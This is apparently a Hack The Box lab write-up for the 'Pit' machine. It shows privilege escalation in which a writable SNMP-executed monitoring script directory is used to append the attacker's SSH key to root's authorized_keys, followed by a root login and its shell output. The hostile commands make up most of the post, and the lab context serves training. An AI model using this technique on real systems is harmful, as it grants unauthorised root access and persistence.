InfoSec LAB

Pit_Privilege_Escalation_2

Created: 2 min read

OS Command Injection

i discovered that the net-snmp-extend-mib::nsExtendCommand OID, an extension to Net-SNMP Agent, has an custom binary configured at /usr/bin/monitor, which is executing a series of Bash scripts in the /usr/local/monitoring directory where ACL is configured likely by SELinux to grant the michelle user only write and execute privileges.

Using the ACE configured by SELinux, I was able to test the flaw in the Bash script by writing an arbitrary testing command as it would execute anything that follows the structure; /usr/local/monitoring/check*sh

Here, I will attempt escalate privilege by writing my own piblic SSH key into the authorized_keys file of the root user

[michelle@pit monitoring]$ echo 'echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali >> /root/.ssh/authorized_keys' > /usr/local/monitoring/check_ssh.sh
 
[michelle@pit monitoring]$ cat check_ssh.sh
echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali >> /root/.ssh/authorized_keys

It’s all set. next time snmp is called, the target system will execute the net-snmp-extend-mib::nsExtendCommand.”Monitoring”, which points to the Bash script(/usr/bin/monitor) that executes /usr/local/monitoring/check*sh, therefore executing /usr/local/monitoring/check_ssh.sh

┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ssh root@pit.htb -i ~/.ssh/id_ed25519 
enter passphrase for key '/home/kali/.ssh/id_ed25519': 
web console: https://pit.htb:9090/
 
last login: Fri Apr  7 13:14:21 2023 from 10.10.14.5
[root@pit ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@pit ~]# whoami
root
[root@pit ~]# hostname
pit.htb
[root@pit ~]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:34:c4 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.241/24 brd 10.10.10.255 scope global noprefixroute ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::fc6f:c2ab:4f8e:bbca/64 scope global dynamic noprefixroute 
       valid_lft 86393sec preferred_lft 14393sec
    inet6 fe80::8811:73af:e9e:6b74/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

System Level Compromise I am also not bound by SELinux

Interactive Graph View

Backlinks